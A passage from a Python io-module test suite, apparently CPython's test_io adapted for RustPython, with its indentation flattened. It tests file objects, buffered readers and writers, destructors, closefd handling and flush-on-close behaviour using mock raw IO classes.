# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(support.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
@unittest.skip("TODO: RUSTPYTHON, specifics of operation order in close()")
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
# TODO: RUSTPYTHON, cyclic gc
@unittest.expectedFailure
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
@unittest.skip("TODO: RUSTPYTHON, pyio version depends on memoryview.cast()")
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
# TODO: RUSTPYTHON, sys.unraisablehook
@unittest.expectedFailure
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
@unittest.skip("TODO: RUSTPYTHON, specifics of operation order in close()")
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@unittest.skip("TODO: RUSTPYTHON, fallible allocation")
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
@unittest.skip("TODO: RUSTPYTHON, pyio version depends on memoryview.cast()")
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
